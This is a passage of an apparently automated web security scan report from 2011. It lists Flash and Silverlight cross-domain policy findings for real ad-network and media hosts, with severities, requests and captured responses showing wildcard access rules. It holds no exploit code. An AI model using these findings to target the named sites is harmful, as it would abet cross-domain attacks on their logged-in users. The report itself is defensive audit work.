HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 16 Jan 2007 19:43:34 GMT
ETag: "98-4272d93d40580"
Accept-Ranges: bytes
Content-Length: 152
X-Server-Name: kwmweb@dc1kwmweb07
Keep-Alive: timeout=3, max=498
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.keywordmax.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://www.dictof.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dictof.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:09 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Wed, 23 Sep 2009 22:46:44 GMT
ETag: "14f-474467d34fd00"
Accept-Ranges: bytes
Content-Length: 335

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.31. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:20:00 GMT
Expires: Sun, 24 Apr 2011 21:20:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 21200
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.32. http://i35.tinypic.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i35.tinypic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i35.tinypic.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:44 GMT
Content-Length: 916
Content-Type: text/xml
ETag: "394-39350380"
Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT
Accept-Ranges: bytes
Server: Apache
X-Cache: MISS from tinypic.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="tinypic.com" />
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="photobucket.com" />
<allow-access-from domain="*.dancejam.com" />
<allow-access-from domain="dancejam.com" />
<allow-access-from domain="*.fotoflexer.com"/>
<allow-access-from domain="fotoflexer.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="flektor.com"/>
<allow-access-from domain="*.picnik.com"/>
<allow-access-from domain="picnik.com"/>
<allow-access-from domain="*.glogster.com"/>
<allow-access-from domain="glogster.com"/>
...[SNIP]...

6.33. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:09:23 GMT
Expires: Sun, 24 Apr 2011 21:09:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25850
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.34. http://partners.nextadnetwork.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: partners.nextadnetwork.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:32 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Last-Modified: Fri, 17 Oct 2008 14:23:20 GMT
ETag: "da-45973b505a600"
Accept-Ranges: bytes
Content-Length: 218
X-Server-Name: www@dc1dtweb74
Keep-Alive: timeout=3, max=898
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.directtrack.com" />
</cro
...[SNIP]...

6.35. http://www.apmebf.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apmebf.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.36. http://www.emjcd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emjcd.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.37. http://www.kqzyfj.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kqzyfj.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.38. http://www.securepaynet.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:43:21 GMT
Connection: close
Content-Length: 155

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.securepaynet.net" /></cross-domain-policy>

6.39. http://www.tqlkg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 04:09:52 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.40. http://media.compete.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.compete.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.compete.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Mar 2011 18:08:23 GMT
ETag: "b8c48-20c-f226f3c0"
Accept-Ranges: bytes
Content-Length: 524
Content-Type: application/xml; charset=utf-8
Date: Sun, 24 Apr 2011 12:45:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="compete.com" />
<allow-access-from domain="stg.compete.com" />
<allow-access-from domain="www.compete.com" />
<allow-access-from domain="stg.www.compete.com" />
...[SNIP]...
<allow-access-from domain="stg.media.compete.com" />
...[SNIP]...

7. Silverlight cross-domain policy
There are 11 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 24 Apr 2011 04:08:23 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://analytic.hotelclub.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www121
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.5. http://clk.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.6. http://ec.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Sun, 01 May 2011 12:29:09 GMT
Date: Sun, 24 Apr 2011 12:29:09 GMT
Content-Type: text/xml
Content-Length: 312
Allow: GET
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:34:42 GMT
Expires: Thu, 21 Apr 2011 00:33:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 43343
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://spe.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Tue, 26 Apr 2011 00:56:06 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.9. http://switch.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:14 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:32 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
